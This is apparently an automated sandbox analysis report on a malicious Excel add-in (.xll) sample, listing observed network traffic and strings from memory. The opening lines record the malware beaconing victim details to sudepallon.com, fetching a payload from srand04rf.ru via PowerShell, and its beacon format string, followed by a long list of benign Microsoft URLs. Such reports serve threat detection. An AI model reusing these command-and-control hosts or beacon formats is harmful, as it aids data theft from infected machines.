        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00611FC0 InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,16_2_00611FC0
        Source: global trafficHTTP traffic detected: GET /92375234.xml HTTP/1.1Connection: Keep-AliveHost: srand04rf.ru
        Source: global trafficHTTP traffic detected: GET /08.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: srand04rf.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
        Source: unknownDNS traffic detected: queries for: srand04rf.ru
        Source: unknownHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: snd32sys.exeString found in binary or memory: http://api.ipify.org
        Source: snd32sys.exe, 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmpString found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
        Source: 0708_5355150121.xllString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
        Source: powershell.exe, 00000002.00000003.226352766.0000000007D51000.00000004.00000001.sdmp, 0708_5355150121.xllString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: 0708_5355150121.xllString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
        Source: 0708_5355150121.xllString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
        Source: 0708_5355150121.xllString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
        Source: 0708_5355150121.xllString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
        Source: powershell.exe, 00000002.00000002.350802485.0000000005BA1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: 0708_5355150121.xllString found in binary or memory: http://ocsp.comodoca.com0
        Source: 0708_5355150121.xllString found in binary or memory: http://ocsp.sectigo.com0
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png8
Source: powershell.exe, 00000002.00000002.348512770.0000000004B41000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.331698788.00000000048E1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.333951627.0000000004CEF000.00000004.00000001.sdmp | String found in binary or memory: http://srand04rf.ru
Source: powershell.exe, 00000006.00000002.333971406.0000000004CF7000.00000004.00000001.sdmp | String found in binary or memory: http://srand04rf.ru/08
Source: PowerShell_transcript.888683.93l2YHGR.20210708163033.txt.6.dr | String found in binary or memory: http://srand04rf.ru/08.jpg
Source: powershell.exe, 00000006.00000002.332529239.0000000004AEB000.00000004.00000001.sdmp | String found in binary or memory: http://srand04rf.ru4&jt
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html8
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.aadrm.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.addins.store.office.com/app/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.cortana.ai
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.diagnostics.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.diagnosticssdf.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.microsoftstream.com/api/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.office.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.onedrive.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://apis.live.net/v5.0/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://augloop.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://augloop.office.com/v2
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://autodiscover-s.outlook.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://cdn.entity.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://clients.config.office.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://config.edge.skype.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://cortana.ai
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://cortana.ai/api
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://cr.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://dataservice.o365filtering.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://dataservice.o365filtering.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://dev.cortana.ai
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://devnull.onenote.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://directory.services.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://enrichment.osi.office.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://entitlement.diagnostics.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.348758603.0000000004C80000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester8
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000006.00000003.320087365.000000000530E000.00000004.00000001.sdmp | String found in binary or memory: https://go.micro
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://graph.ppe.windows.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://graph.ppe.windows.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://graph.windows.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://graph.windows.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://incidents.diagnostics.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://lifecycle.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://login.microsoftonline.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://login.windows.local
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://management.azure.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://management.azure.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://messaging.office.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://ncus.contentsync.
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://ncus.pagecontentsync.
Source: powershell.exe, 00000002.00000002.350802485.0000000005BA1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://officeapps.live.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://onedrive.live.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://onedrive.live.com/embed?
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://osi.office.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://outlook.office.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://outlook.office365.com/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://pages.store.office.com/review/query
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://powerlift.acompli.net
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 0708_5355150121.xll | String found in binary or memory: https://sectigo.com/CPS0
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://settings.outlook.com
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://shell.suite.office.com:1443
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://skyapi.live.net/Activity/
Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.dr | String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
